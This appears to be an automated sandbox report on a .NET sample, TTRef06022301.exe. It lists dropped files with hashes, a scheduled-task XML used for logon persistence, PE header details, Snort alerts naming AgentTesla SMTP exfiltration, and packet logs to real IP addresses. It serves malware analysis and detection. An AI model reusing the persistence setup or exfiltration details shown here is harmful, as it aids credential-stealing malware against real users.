                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):21748
                                                                                                                                    Entropy (8bit):5.598068395793424
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:JtCRLq0yg5TPwIW0H13n3ISjnyjulrIt+iJ9glSJ3uyV1Fm0ZaAVrdts/GA+inY8:XwPwIWkdYoyClrSulcuGnJ8
                                                                                                                                    MD5:D084CC0D0513FE4671BEA3A4D3C20151
                                                                                                                                    SHA1:64EC8309103AD771BDA7488E71ADFDAD0D4ED854
                                                                                                                                    SHA-256:4AE2F910F0241FD12D1D54052DD9F04E72ECC1B93A4C42DCDAB9B568152D4BF2
                                                                                                                                    SHA-512:3E2FCA1CF87867EFA356AB583BE7742C21FE5F2E60F60CE5BA753B164EC1C2FB531BC0F66CEB0839E6C6343A191F21919DC6806A2A92CAE403FFF8F7825222AD
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:@...e.....................2.~.y.W...8.X..............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wans0q1.1xy.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:1

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2r2cwhb.zcb.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:1

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jsw3rikj.zqe.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:1

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_su0py3li.ed1.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:1

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp685E.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1613
                                                                                                                                    Entropy (8bit):5.1408766910366035
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:2di4+S2qh/dp1Kd+y1modHUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt1xvn:cgeHMYrFdOFzOzN33ODOiDdKrsuTLv
                                                                                                                                    MD5:9298D68607CC78CBFBF5356B3450ED49
                                                                                                                                    SHA1:6200BDAAF56F69E4055870CEECEB4E5A1AADC9D5
                                                                                                                                    SHA-256:CF4BB042E675BEA6636BC47B7BBE07E52440CBB1EE35E72D062D15EFB1B21230
                                                                                                                                    SHA-512:74E2E33D1B3E032FEF3BBCFD20CEC50F932A6A88373CCEB9AFAFA4EDB8FB12C2847E3A41DCDB98DA3A1139FD08DC36B415A6810966452B19C3B1E04B793B39F5
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvai

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpC6BA.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1613
                                                                                                                                    Entropy (8bit):5.1408766910366035
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:2di4+S2qh/dp1Kd+y1modHUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt1xvn:cgeHMYrFdOFzOzN33ODOiDdKrsuTLv
                                                                                                                                    MD5:9298D68607CC78CBFBF5356B3450ED49
                                                                                                                                    SHA1:6200BDAAF56F69E4055870CEECEB4E5A1AADC9D5
                                                                                                                                    SHA-256:CF4BB042E675BEA6636BC47B7BBE07E52440CBB1EE35E72D062D15EFB1B21230
                                                                                                                                    SHA-512:74E2E33D1B3E032FEF3BBCFD20CEC50F932A6A88373CCEB9AFAFA4EDB8FB12C2847E3A41DCDB98DA3A1139FD08DC36B415A6810966452B19C3B1E04B793B39F5
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvai

                                                                                                                                    C:\Users\user\AppData\Roaming\iJyzakGsXF.exe

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):791552
                                                                                                                                    Entropy (8bit):7.972515156065869
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:DpkOPAdcXnyXx6q171UTaZL3vIuGBxh+A1FmJEbJHP2OJ7eEahRZ5G:5Ad1NhZL3iBxh+A1Fmibhz7hS5G
                                                                                                                                    MD5:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    SHA1:E0DC6B437E0597DA471E18D2EE55D412A7E5CF1A
                                                                                                                                    SHA-256:BFD2500B6963725AA9252FED8EB549A976CA73C9317746C40E5EB406641EAE17
                                                                                                                                    SHA-512:230A28F20FADACE78E97AD467EE53B80A679F6133440FE3BADF9A016311284B369F61256A4ED0ABFB478D1F387E03E70679AC3AB8A3D651084D2998D04C659BA
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............0.............^!... ...@....@.. ....................................@..................................!..O....@..8....................`..........T............................................ ............... ..H............text...d.... ...................... ..`.rsrc...8....@......................@..@.reloc.......`......................@..B................>!......H........R..dI......J........f...........................................0..#................o....(..........s.....+..**...o.....*...0............o.....+..*.0....................o....(....o.....+..*..+.*".(.....*r..}.....s....}......(......*n..}.....s....}.....(......*....0..N...........{.....o......o .....,....+-..{.....o.....{....o!......{.......X}......+..*...0............o"...o.....+..*....0............o#....+..*.0...........s$....+..*..0..d.......s%......}&.....|'.......

                                                                                                                                    C:\Users\user\AppData\Roaming\iJyzakGsXF.exe:Zone.Identifier

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Entropy (8bit):7.972515156065869
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                    File name:TTRef06022301.exe
                                                                                                                                    File size:791552
                                                                                                                                    MD5:5478729e3225d4f158f811d03a8d4945
                                                                                                                                    SHA1:e0dc6b437e0597da471e18d2ee55d412a7e5cf1a
                                                                                                                                    SHA256:bfd2500b6963725aa9252fed8eb549a976ca73c9317746c40e5eb406641eae17
                                                                                                                                    SHA512:230a28f20fadace78e97ad467ee53b80a679f6133440fe3badf9a016311284b369f61256a4ed0abfb478d1f387e03e70679ac3ab8a3d651084d2998d04c659ba
                                                                                                                                    SSDEEP:12288:DpkOPAdcXnyXx6q171UTaZL3vIuGBxh+A1FmJEbJHP2OJ7eEahRZ5G:5Ad1NhZL3iBxh+A1Fmibhz7hS5G
                                                                                                                                    TLSH:B7F42310725AD638C8BEF6B2ABFDB8D0537CA3222956D96C8CB810DFDD61759C1B0613
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............0.............^!... ...@....@.. ....................................@................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:8200828182820000

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x4c215e
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x63E110F2 [Mon Feb 6 14:38:42 2023 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc210a0x4f.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000xd38.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xc02040x54.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x20000xc01640xc0200False0.9621917188516591data7.977721750892678IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rsrc0xc40000xd380xe00False0.7416294642857143data6.305469622480461IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .reloc0xc60000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                    Resources

                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                    RT_ICON0xc40c80x8ffPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                    RT_GROUP_ICON0xc49d80x14data
                                                                                                                                    RT_VERSION0xc49fc0x338data

                                                                                                                                    Imports

                                                                                                                                    DLLImport
                                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                                    Network Behavior

                                                                                                                                    Snort IDS Alerts

                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                    192.168.2.788.99.90.21497165872030171 02/09/23-19:40:35.012308TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49716587192.168.2.788.99.90.21
                                                                                                                                    192.168.2.788.99.90.21497215872030171 02/09/23-19:40:59.212357TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49721587192.168.2.788.99.90.21

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Feb 9, 2023 19:40:24.616727114 CET49715443192.168.2.7104.237.62.211
                                                                                                                                    Feb 9, 2023 19:40:24.616786957 CET44349715104.237.62.211192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:24.616872072 CET49715443192.168.2.7104.237.62.211
                                                                                                                                    Feb 9, 2023 19:40:24.685894012 CET49715443192.168.2.7104.237.62.211
                                                                                                                                    Feb 9, 2023 19:40:24.685928106 CET44349715104.237.62.211192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:25.196743965 CET44349715104.237.62.211192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:25.196902990 CET49715443192.168.2.7104.237.62.211
                                                                                                                                    Feb 9, 2023 19:40:25.200385094 CET49715443192.168.2.7104.237.62.211
                                                                                                                                    Feb 9, 2023 19:40:25.200401068 CET44349715104.237.62.211192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:25.200865984 CET44349715104.237.62.211192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:25.314053059 CET49715443192.168.2.7104.237.62.211
                                                                                                                                    Feb 9, 2023 19:40:25.683526993 CET49715443192.168.2.7104.237.62.211
                                                                                                                                    Feb 9, 2023 19:40:25.683562040 CET44349715104.237.62.211192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:25.847439051 CET44349715104.237.62.211192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:25.847583055 CET44349715104.237.62.211192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:25.847681999 CET49715443192.168.2.7104.237.62.211
                                                                                                                                    Feb 9, 2023 19:40:25.853321075 CET49715443192.168.2.7104.237.62.211
                                                                                                                                    Feb 9, 2023 19:40:34.638922930 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:34.662579060 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.662755013 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:34.706062078 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.706923962 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:34.732095003 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.733659029 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:34.757739067 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.758281946 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:34.822628021 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.912858963 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.913141966 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:34.936597109 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.939181089 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.939482927 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:34.973017931 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.973248959 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:34.996680975 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.996709108 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:35.012307882 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:35.012401104 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:35.013139009 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:35.013189077 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:35.035732031 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:35.036379099 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:35.045454025 CET5874971688.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:35.096127987 CET49716587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:46.528764009 CET49718443192.168.2.7173.231.16.76
                                                                                                                                    Feb 9, 2023 19:40:46.528839111 CET44349718173.231.16.76192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:46.528918982 CET49718443192.168.2.7173.231.16.76
                                                                                                                                    Feb 9, 2023 19:40:46.548599005 CET49718443192.168.2.7173.231.16.76
                                                                                                                                    Feb 9, 2023 19:40:46.548645973 CET44349718173.231.16.76192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:48.040225029 CET44349718173.231.16.76192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:48.040364027 CET49718443192.168.2.7173.231.16.76
                                                                                                                                    Feb 9, 2023 19:40:48.050077915 CET49718443192.168.2.7173.231.16.76
                                                                                                                                    Feb 9, 2023 19:40:48.050120115 CET44349718173.231.16.76192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:48.050640106 CET44349718173.231.16.76192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:48.128472090 CET49718443192.168.2.7173.231.16.76
                                                                                                                                    Feb 9, 2023 19:40:49.000050068 CET49718443192.168.2.7173.231.16.76
                                                                                                                                    Feb 9, 2023 19:40:49.000092983 CET44349718173.231.16.76192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:49.156790972 CET44349718173.231.16.76192.168.2.7
